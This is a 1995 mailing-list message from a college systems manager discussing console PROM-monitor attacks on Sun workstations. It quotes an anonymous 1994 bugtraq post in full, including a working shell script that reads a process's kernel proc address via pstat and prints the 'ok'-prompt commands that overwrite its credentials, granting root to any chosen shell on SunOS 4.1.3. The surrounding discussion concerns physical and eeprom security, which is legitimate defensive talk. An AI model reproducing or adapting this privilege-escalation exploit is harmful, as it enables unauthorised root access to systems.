>>>>> On Fri, 14 Apr 1995 09:17:25 +0800, patrick@oes.amdahl.com (Patrick Horgan) said: > Browsing through some archived "bugtraq" messages I discovered a > really nifty way to change the effective and real userid of any > process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x). > That particular hole is demonstrably exploitable under Solaris 2.3 > (and I assume Solaris 2.4), except for one little problem.... > ph> I'd have to think...we used to be able to do this via the prom ph> debugger. I'll attach the message I found browsing spy.org's Web server at the end of this one. It will probably be a good memory refresher. :-) ph> We wouldn't have to know any address ahead of time, but ph> could walk the kernels tables in the debugger from the prom ph> prompt. I'd thought of that, too. More work, though -- SunOS 4's "pstat" is so kind to give almost the exact address needed. ph> I'd hope everyone knows ph> that physical security is important, and that if you don't have it ph> your in deep doo-doo. You've got a point there. At St. Olaf, we've got our machines "protected" by the root password if you attempt to boot into single-user mode (and haven't really cared all that much if someone went to the trouble of bringing their own Sun-style-bootable drive), but finding out about the monitor attack was a cool (in a twisted sense) discovery. "eeprom security-mode=command (?)", here we come. -Scott --- Scott E. Lystig Fritchie, UNIX Systems Manager Co-founder: Academic Computing Center, St. Olaf College Twin Cities Free-Net 1510 St. Olaf Ave., Northfield, MN 55057 Organizing Committee fritchie@stolaf.edu ... 507/646.3407 (Minneapolis/St. Paul, MN) "Activism is the killer app for the net." -- Steven Cherry <stc@panix.com> --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- #!/bin/sh - # From: an100188@anon.penet.fi # Subject: Breaking in from the monitor at the console # Date: Fri, 27 May 1994 15:34:36 UTC # To: bugtraq@crimelab.com # # Breaking into a machine, typically a workstation, by using the monitor # at the console to poke values into memory has always been possible. I # didn't realize how simple and unobtrusive it was before I saw this # script. This one is for Suns, but the principle applies to any # machine with a console monitor. On Sun4s there is some sort of # "secure mode" that I presume lets you disable the monitor. It is # possible to change the L1-A sequence to another pair of keys, but if # you own /dev/console you can change it back. This obscurity may or # may not be useful. # # This particular attack needs a way to run the script on the machine, # typically in a shell. I presume there are other spots where you could # tickle a machine that don't even require that. Physically secure # consoles prevent this attack. # # Sigh. # # ---------------------------------------------------------------------------- # # Subject: Re: Breaking in from the monitor at the console # Date: Sat, 28 May 1994 10:15:52 UTC # To: bugtraq@crimelab.com # # Oops, someone pointed out that the script was deleted by the anonymous # mail signature-remover. Sorry about that. Here's the script: # # # # Program: fc-4.1.3 # Author: Anonymous # Usage: fc-4.1.3 PID # PID is the PID of the shell you wish to give root to. # # Description: # Tell people how to give themselves root (on SunOS 4.1.3 machines) # # Give the program a known path PATH="/bin:/usr/etc:/usr/ucb" export PATH if [ $1x = x ]; then cat - << EOF Usage: $0 PID Where PID is the PID of the shell you want to give root to. Note - for csh the PID is stored in \$\$. EOF exit 1 fi # This is the start of the proc structure for a given PID. procp=`pstat -u $1 | grep procp | cut -f2` # This is really the only important information here. # This number is the offset of the pointer to the cred structure # in the proc structure. ucred="4c" cat - << EOF On the console press '<L1>a', you should see then see the following message: Type 'go' to resume ok type the following at the 'ok' prompt: b 2 do 0 $procp $ucred + l@ i + w! 2 +loop go Notes: * On some sun keyboards the '<L1>' key is labeled 'Stop'. * There is Emacs style line editing available at the 'ok' prompt. EOF exit 0